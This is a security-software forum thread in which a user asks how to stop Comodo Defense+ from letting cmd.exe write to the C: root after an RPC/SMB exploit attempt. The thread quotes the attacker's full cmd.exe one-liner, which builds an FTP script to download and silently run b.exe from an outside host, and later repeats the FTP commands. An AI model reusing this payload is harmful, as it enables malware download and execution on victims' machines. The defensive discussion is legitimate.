How to prevent CMD from create/modify files on C: root

Hi all,
once I installed CIS (ver 3.8.65951.477) and disabled Windows firewall, it suddenly happened, soon after I was connected to Internet via a provider that assign public IP (it doesn’t happens with other NATted provider), that I received an alert from F+ about an Incoming connection to “System”.
Well, later I found that it was a “always running” exploit attempt that target RPC service and File&Printer sharing service.
Even if WinXP SP2 RPC should be immune from this kind of exploit, once I allowed the incoming connection request the exploit went ahead and a new CMD.EXE process were created as wmiprvse.exe child.

Well… the CMD.EXE task were fired with these arguments:
cmd /c echo open f1tp.3322.org>c:\gz&& echo f1t>>c:\gz&& echo f1t>>c:\gz&& echo binary>>c:\gz&& echo get b.exe c:\aa.exe>>c:\gz&& echo bye>>c:\gz&& echo del c:\run.vbs>c:\a.bat&& echo del c:\a.bat>>c:\a.bat&& echo ftp -s:c:\gz>c:\ff.bat&& echo c:\aa.exe>>c:\ff.bat&& echo del c:\gz>>c:\ff.bat&& echo cmd /c c:\a.bat>>c:\ff.bat&& echo del c:\ff.bat>>c:\ff.bat&& echo CreateObject(“WScript.Shell”).Run “cmd /c c:\ff.bat”,0 >c:\run.vbs&& c:\run.vbs

If it’s not clear, that way CMD.EXE create four files (gz, a.bat, ff.bat, run.vbs), and then run the VBScript file (run.vbs).
That script launch, as hided, the batch file, that start the ftp task which execute the ftp commands listed on file “gz” to download the executable file aa.exe; once the maleware is downloaded it is then started.

Of course, thanks to CIS, I was able to follow all the steps and stop the process before the VBscript file was executed… then I downloaded the malware by myself and sent it to VirusTotal for a check.

That said this is the main question:
How do I prevent CMD.EXE to create/modify files on the root folder of C: partition?

I went to “Computer Security Policy” and then edited CMD.EXE “Protected File/Folders” Access Rights and addedd “C:*” to the “Blocked Files/Folders”…however it doesn’t seems to work.
I made a test batch file that create a C:\Temp.txt file and then run FTP; and even in Paranoid mode, D+ intercept the attempt to run the ftp executable but doesn’t intercept nor it prevents CMD.EXE from create the C:\Temp.txt file.

I was able to get something similar to what I want by creating a new “System partition root” group inside “My Protected Files”, that point to “C:*”.
This way, while in “paranoid mode”, D+ intercept the CMD.EXE file creation attempt, but it intercept also the modifications attempt to any files on C: of all the running task that doesn’t have “allow” on “Protected File/Folders” Access Rights.

Is there a way to protect just the main level folder excluding the sub-folders?
Is there a way to intercept file creation/modification attempt from just CMD.EXE?

Any help/advice will be greately appreciated

Greetings.
Alessio

[attachment deleted by admin]

I guess it would be more effective to configure Defense+ Tasks > Advanced > Image Execution Control Settings as follows

and add a Computer Securty policy for %windir%\system32\cmd.exe (eg after removing the existing one) at the top of the policy list in order to configure the blocked list for Run an executable access right to prevent cmd.exe from running ftp.exe and scripting hosts.

eg:

• %windir%\system32\ftp.exe
• %windir%\system32\wscript.exe
• %windir%\system32\cscript.exe
• %windir%\system32\mshta.exe

Adding a firewall rule to prevent inbound communications to the potentially vulnerable services could be another reasonable option along with periodical scans with Comodo Vulnerability Analyzer.

[attachment deleted by admin]

Hi Endymion,
thank you so much for your advice

Actually I have my Image Execution Control Settings already set as shown in the picture you posted, and I’m aware that I can prevent CMD from running FTP.exe as long as any other executable by adding it to the blocked application list.

The point is that I simply do not want cmd.exe being able to write any kind of files on the root of C: partition… even more… I want that CIS alerts me if CMD.EXE attempt to create/modify any file on the root of C: partition (as well on any other folder I want to keep “clean”)

This way I think I’ll be able to intercept any even still unknown intrusion method that makes use of the console to control my system and leave files on it.

As I develop and use on daily basis VBscripts programs, blocking CMD from running Wscript.exe is not safe on the long term… as in the future it could happen that, for some reason, I will grant CMD to run a script made by me and that way, if I also click on the “remember my choice” option, I could “break” the protection I’ve set today.
I would say the same about blocking ftp commad.
On the other side I think I’ll never write any script that creates/leaves files on the root of C: partition, nor on any other system folder.

Indeed my advice was to leverage on multiple protection layers thus superseding the necessity apparently implied by you point.

That would be my advice for everybody else too although it is uncommon to bypass the firewall and BO protection along with updated security critical services.

Anyway explicitly blocking the spawning of scripting hosts from the command line will also prevent allowing such execution by mistake (eg remember my answer) but still legitimate scripts could be manually launched from explorer thus allowing any common scripting activity.

D+ wildcards (* and ?) allow to monitor unknown files and extensions (Defense+ Tasks > Common Tasks - My Protected Files) but do not provide unlimited flexibility to the point it is possible to limit monitoring only to the root of an hard disk for all unknown file/extensions using a single-line wildcarded path.

Indeed it would be somewhat possible by adding all combinations of ? and .* variants up to the max_path length you wish to monitor although IMHO this will not grant much security-wise.

It would be slightly better to add some specific extensions to the protected file list of Executables (featured in Comodo - Proactive Security config) and thus enable D+ to alert when such new files are created.

Anyway to leverage on the highest degree of configurability and address more peculiar scenarios there is D+ paranoid mode along with Comodo - Proactive Security configuration thus allowing the most complex and fine-tuned rulesets possible.

Well, you might wonder how many Windows users in the world do not have an updated system due to the lack of a broadband Internet connection… have you ever heard about something called “digital-divide”?

Bypass a FW is possible as long as it is possibile to breach into the victim system by its browser.
I’m not saying that a well configured FW is not useful… i’m saying that it is not enough.

In my opinion Proactive protection is the more “future-proof”… but, of course, not so simple to setting up.

However, apart from your good advices, do you know why, If I add “C:*” to the “Blocked Files/Folders” Access Rights of CMD.EXE, D+ still doesn’t prevent CMD.EXE to create/modify files on C: partition even if D+ is set to Paranoid mode?

Am I missing something?

If you do not mind I would like to ask you if you are digitally divided (and coincidentally also using a provider that assign a public IP) and if you would advise anyone in such condition to leave critical services exposed (eg DCOM) without downloading even a single patch (nevermind an entire service pack which could be also requested from Microsoft itself).

I wonder if users may also be willing to disable or impair each layer themselves although I’m not able to advise them to do so.

Still as long there is a way, and a will, it would be possible to be reasonably protected especially considering the BO protection is unlikely to fail so easily.

A present-proof, yet simple, solution to address unlikely/unlucky scenarios was indeed already mentioned.

I guess because you feel inclined to follow your point (which among other things involved explictly allowing an inbound connection to vulnerable system services) despite advices.

I somewhat gather from your testcases that your point is that you wish to get an alert even for the creation of a .txt file and yet, as monitoring the creation of such files wouldn’t be enough, you also wish to be alerted for the modification of such files.

Eh eh… I guess you are kidding… aren’t you?
I’m not intended to have FW disabled and vulnerable system services exposed to the public network…
I have my FW setted up, and the above mentioned exploit example is just “story”… it hasn’t really hurt my system at the first time (coz CIS has intercept it) nor it will in the future (cos I already have setted up all the appropriate FW rules).

What I’m looking here is not “a way” to be “safer” while connected to the Net…
I just would like to know IF it is possibile to set D+ to prevent a “single” executable from access/modify a single folder
and
I would like to know also why the “Blocked Files/Folders” settings I made were ignored by D+

Theese are just technical questions.

BTW, yes… I think I am somewhat digital-divided and I cannot even think to stay hours connected to the phone line (and having it busy all the time) because of the CIS update, or the FireFox update, or the Windows Update (etc… etc…)
The 56K bandwidth available to me (5 Kbyte/s) is almost not sufficient to browse todays web pages (they are more “heavy” today then five years ago) and if all the application installed on my system wants to update while I’m connected I could not browse anything for sure.

I guess I should add that I live in North Italy… so, please, consider that my Italian-to-English translation have for sure many mistakes and is not very accurate.

Regards.
Alessio

have you tired any of these companies for internet service?

http://dir.yahoo.com/Business_and_Economy/Business_to_Business/Communications_and_Networking/Internet_and_World_Wide_Web/Network_Service_Providers/Internet_Service_Providers__ISPs_/By_Region/Countries/Italy/Complete_List

someone is bound to offer cheap DSL to you. Here in the USA I can get DSL for the same price I pay for dial up so why even bother?

To possibly get an alert, files ought be monitored, if they are not, adding an entry to Protected files list by explicit mention or by additionally using wildcards (? and/or *) and path variables (eg %windir%) will extend default monitoring (different configurations provide different defaults).

eg. adding c:\test* to protected files list will monitor all files/folders with whatsoever extension contained in c:\test (including C:\test\test.txt and c:\test\folder.test\newtest.txt)

The creation of new files/folder for monitored paths is usually enforced, by means of alerts, for all applications (exception made for D+ Training mode and D+ CleanPC mode for applications not featured in pending list).

The enforcement (by means of alerts) of modification for existing files/folders pertaining monitored paths is extended to safelisted applications only in D+ paranoid mode.

According to your specific contingent needs and prescinding from security considerations, as the exploit example was just “story”, was there any point to neglect all the existing ways to leverage on CIS protection to get an alert for C:\temp.txt?

Ha ha ha…
no more kidding please.

Digital-divide is a “sad” thing >:(

Here, in Italy, only one telephony company have made the hardlines on the whole country over the last 40 years… it is Telecom (Alice is its broadband trademark).
The thing is simple: if Telecom doesn’t provide DSL connection… no other can… “DOT”.
Where I live (and thousand of other locality) no DSL connection is available… nor from Telecom neither from any other company.

Ok… enough… please don’t drive me to talk about Italy… coz it makes me very nervous.

The point is NOT “neglect” something in favour of someother.
The point is that I want to be alerted if a potentially remote-controlled application (CMD.EXE) is trying to do something “strange” (as writing/modifing files on specified folders).

I was very near to have the system compromised because, while trying to troubleshoot a connection problem with a VPN server, I had accidentally disabled both the Windows and the CIS firewall… and wasn’t aware of it till I found that “those malicious files” were created again on the root of my C:
There would be “cases” where the “frontlines” protections are by-passed and, you know, I cannot keep my system and applications updated (I can’t even use the CIS antivirus… coz It isn’t updated).
So I think, the best option is to intercept any “misbehaviour” of the running application available on my system.
That’s what is called “pro-active” protection… isn’t it?

However, another point is:
I want to know “exactly” how D+ manage/monitor “protected files”.
I want to know “exactly” how it works, what it can do and what it can’t… so that I can setting it up as I want.

It’s a knowledge matter.
What’s the meaning of the presence of the “Blocked File/Folders list” (I’m not talking of “protected File/Folders list”) that belong to the “Protected File/Folders_Process Access Rights” if adding “C:*” to the list doesn’t prevent the process to create/modify files on the “supposed” Protected File/Folders?

http://immagini.p2pforum.it/out.php/i418010_ProtectedFolderAccessRights.gif

I have tried once again…
I made a two row batch file with “echo > C:\test.txt” (row one) and “ftp” (row two) on it.
D+ set in paranoid mode.
When I run the batch file C:\test.txt is created and then D+ intercept the execution of ftp.

So, it seems that something is missed on the way.
88)

Even more Comodo - Proactive Security would be an undoubtely reasonable choice in case the AV cannot be installed or updated.

And the top of pro-active protection for potentially vulnerable setups is Comodo - Proactive Security along with D+ Paranoid mode (although the BO protection should be already able to prevent such exploits).

That way the user decides what explicitly trust and to what degree after the initial configuration was carried using other D+ Modes. Yet it would be still possible to create a custom predefined policy and assign it to any application, regardless if an alert mention an app to be safelisted, or fine-tune existing policies.

I cannot ask questions for you but I assumed you were already able to see the meaning of modifying the Protected file list (AKA "My Protected Files ") to extend the default monitoring.

But yet preventing the execution would be a viable alternative and still allow to run custom made legitimate scripts nevermind using Comodo - Proactive Security profile/configuration or disabling unneeded but known vulnerable services (eg DCOM) thus reducing the potential attack surface.

As I gather this time you obviously neglected to follow your own previously mentioned test-case, indeed something ought to be unintentionally missed on the way.

Yes, Endymion,
you are right, before executing my test bacth file I have removed the “System partition root” group (C:*) from “My Protected Files”.
I see that file/folders listed in “My Protected Files” are protected against modification by any running process… it’s like a “global” rule.
But… what about the “Blocked File/Folders” list that belong to the “Protected File/Folders_Process Access Rights”?

http://immagini.p2pforum.it/out.php/i418010_ProtectedFolderAccessRights.gif

Shouldn’t file/folders listed there (“C:*”) being protected against modification attempt from the process to which the list is related? (CMD.EXE)

If it should, why my test batch file is able to make a new file on the protected folder?
If not, what’s the real meaning of that “Blocked File/Folders” list?

One of the things that I appreciate of CIS, is its User Guide, its contextual help…
but on this single point I didn’t found enough explanations…
well… I didn’t found “any” explanation.

So I suppose that if I want to prevent a named process to be able to modify a named file/folder I could configure the process related “Access Rights”->“Protected File/Folders”->“Blocked File/Folders” and add there the file/folder I want to be protected from the process.

But if I am right, why my test failed?

Endymion, it seems to me that you talk like an “advanced user”.
Have you experience on programs developping?
Well, I have… and I need to know how works, what does, every single programming language instruction if I want to be able to use it at the need.

And if I want to be able to configure CIS as much as possibile close to my (or other) needs, I must know exactly what any available option does.

This is the point… knowledge->power->freedom

Regards.
Alessio

As some details of the story changed I wish to mention that disabling Defense+ will disable BO Protection too.

AFAIK All protected entities have “global” application whereas I gathered they were added because they may be relevant for security and it ls likely they are optimized to minimize unnecessary alerts too.

If the meaning you implied was that it was possible to add whatsoever path to the blocked list even in case D+ is not configured to monitor it, it should be evident by now that to possibly get an alert, files ought be monitored.

I assumed that you were aware of that when you explicitly tested “My protected files” although I also mentioned that aspect.

Strange, I linked http://wiki.comodo.com/CIS/Help_Guide/Defense_Task_Center/My_Protected_Files plenty of times already. ???

I cannot possibly understand the reason of your failure but I recall you already confirmed that you were able to get an alert for the creation/modification of C:\Temp.txt in D+ paranoid mode

I could be wrong but I got the impression you are arguing with CIS itself instead to leverage on its functionalities. In any case there are many practicable options to address the story you started this topic with and some of these don’t even involve CIS, which although provide a great reconfigurability potential, IMHO cannot be assumed/demanded to bear an unlimited one.

I’m unable to claim to be a developer nor an advanced user whereas before starting to use CIS I was an utter novice to behavioral security with an average willingness to learn. I’m still eager to learn and every now and them I still discover that it is possible to use CIS in ways I never considered before and indeed these forums provide unvaluable resources in this regard.

I didn’t use much the help either as I found CIS paradigm intuitive for most part and reading through these forums, and sometimes testing by myself, made me aware of what I wasn’t able to get at the beginning.

If you wish to get information from an advanced user and a developer I guess you could PM egemen himself who is CIS lead developer and Security expert.

Altthough it is not a point, IMHO the most difficult things to learn are those deemed to have been learned already.

I don’t know whether this would do the trick or not.

Remove all entries related to Microsoft from Trusted Vendor List (CIS>Defense+>My Trusted Software Vendors) Click Apply.

Change Defense+ to Proactive Security (Right Click CIS>Configuration)

Try again.
(I think you should get alerts this way, but, again you will be inundated with alerts for each and every file / folder creation, even when you download files from internet etc)

hahaha Yes… I agree with you :-TU

Unfortunately the link you posted refer to a Wiki page that is the very same of the User guide related topic.
There you can read how to use “Access Rights”->“Protected File/Folders”->“Allowed File/Folders” list to set a process exception that grant it to access/modify file/folders that are “globally” (against any process) protected because listed in “My Protected Files”
That doesn’t explain what’s the meaning of the “Access Rights”->“Protected File/Folders”->“Blocked File/Folders” list

If it is quite easy to understand that “Access Rights”->“Protected File/Folders”->“Allowed File/Folders” could be used to set a single process “allow” exception against a “global” deny, it’s not clear what’s the meaning of the “Access Rights”->“Protected File/Folders”->“Blocked File/Folders” list.

I gather it should be a list that could be used to set a single process “deny” exception against a “global” default “allow” to modify file/folders not included in “My Protected Files” list.

But my failed test (the one I made with C:* present on “Access Rights”->“Protected File/Folders”->“Blocked File/Folders” list, and NOT present on My Protected Files), tell me that my assumption on the meaning “Access Rights”->“Protected File/Folders”->“Blocked File/Folders” list was incorrect.

Yes, but I was able to get the alert only because I added C:* to My Protected Files… that’s a “global” protection and actually, while in paranoid mode, D+ will intercept every C: file/folder+subfolder modification attempt made by any process (except whose who have Access Rights"->“Protected File/Folders” set to “Allow”).
That way CIS will produce a very high amount of alerts coz the default Access Rights"->“Protected File/Folders” right for all the “non-system/unknown” applications is “Ask” and all that applications will easely have the need to modify file/folders on C: partition.

Maybe its better to make it clear that the “System partition root” group (C:*) in “My Protected Files” it is not a CIS default group; it was made by me and added to the list just to test the CIS capability of intercept write/modify attempt to the C: root folder.
However it was later clear that CIS doesn’t have an option to monitor/protect just the “main level” of a specified folder… but it monitor all its sub-folders too.
This behaviour may exceeds the needs who may wants monitor/protect just one specific folder and not its subfolders.

Yes, to get an alert files ought be monitored AND the “Process” “Protected File/Folders” “Access Rights” need to be set to “Ask”
“Ask” setting will “activate” the related Allow/Block exceptions (accessibile by the “modify” button).
If an exception is met no Alert will be shown by D+, it just execute the exception action (allow or deny).

So, if I set D+ to monitor a folder adding it to “My Protected Files”, and an application has an exception that allow it to modify that protected file/folder, no alert will be shown.
On the opposite if I set a process exception to block its access to “allowed/NOT protected, monitored” files/folders, the process should be blocked by D+, no files should be created/modified, no alert should be shown.

That DID NOT happen when I did the related test.

Why?

Hi layman, thanks for the hint.
I don’t want to mess the Trusted Vendor List so I have preferred to completely disable D+ trust on application digitally signed by Trusted Software Vendors, via D+ Settings pane.

Test settings:
D+ trust on application digitally signed by Trusted Software Vendors: disabled
D+ mode: paranoid
My Protected Files list: C:* NOT present
CMD.EXE->“Access Rights”->“Protected File/Folders”->“Blocked File/Folders” list: C:* present

test batch file (saved as E:\tt.bat):

echo > c:\Test.txt
ftp

Test result:
FAILED
C:\Test.txt file has been created.
A D+ alert was shown when cmd.exe did attempt to create ftp.exe process

Regards.
Alessio

Indeed I did not disabled D+, just CIS firewall.
Yesterday I have reproduced the exploit scenario before writing the first post of this thread.
It was easy, as the exploit attempt is “always on” on the Telecom subnet I can connect to.
And the exploit succeded even if D+ shell code injection detection (Buffer Overflow) were enabled.

I see you read the wiki and the help and are now somewhat arguing about what everybody should/should not understand. :o

Maybe you could send a PM explicitly detailing the changes you wish/suggest for the help file to Meilh, Comodo’s CEO.

As for the story itself there are few things that still puzzle myself, not only because you redefined it few times already.

eg: Did you have enough time to open Process Explorer and grab a picture of cmd.exe commandline payload? How so?

https://forums.comodo.com/index.php?action=dlattach;topic=40540.0;attach=34216

Do you not mind if I ask you again to PM egemen (CIS lead developer) himself and tell him also how reproduce that remote exploit you claim bypassed BO protection?
Indeed it would be a far more interesting finding if confirmed and yet there is almost no verifiable info about it but only about the payload (which AFAIK ought to be intercepted by D+).

Besides there are many ways already to prevent that scenario (IMHO way more effective too).

Please, don’t think at me as if I am an arrogant person (that defenitely I’m not).
Maybe when I said “it is quite easy to understand that…” and “it’s not clear…” I missed to add the words “after reading” and “to me”.

You are kidding again… aren’t you?
I believe no end user is supposed to talk directly to a CEO unless it has some very important question that could be of interest for him.
Even tought the help file and documentation of a so complex and powerful tool such CIS is, is much relevant to the overall “quality” of the product (and I think CIS is a “quality” product), I don’t think that Comodo’s CEO have the time to discuss suggestion about a single topic of the User guide.
If someone isn’t able to “use/understand the use” of any option of CIS, I think it should looking for help and ask here, in this forum, before even to think to ask directly to the CEO or even to a developer.
That’s why I started this thread.

Yes I did, because D+ intercepted the process (CMD.EXE) and so it (the process) will “pause” untill D+ will allow or deny its action attempt (in this case, if denied, the process will terminate).

I don’t know if the exploit is technically based on a shell code injection (BO) but I know for sure (because I was watching at the process active connections both with TcpView and the CIS Firewall “View active connections” tool) that all started by an incoming connection targeting TCP ports 445 (bound to “System” process) and 135 (bound to svchost.exe process).
And AFAIK services bound to System and svchost.exe process are not designed to execute the command prompt… so there should be happen some kind of “in memory” code tampering.

However, just to reply to your request… yes, now that you have made me aware of its name and role, I could PM to egemen.

Anyhow, as you told too, BO prevention is not so critical as long as there are many ways already to prevent that scenario.

Edit: if you want to check by yourself below are the strings passed to ftp.exe to download the infected file.

open f1tp.3322.org
f1t
f1t
binary
get b.exe e:\aa.exe
bye

Eh… I manually downloaded b.exe right now and sent it to VirusTotal…
hahaha guess what…?
the file isn’t still recognized as virus by no one of the 40 VirusTotal used antivirus! :o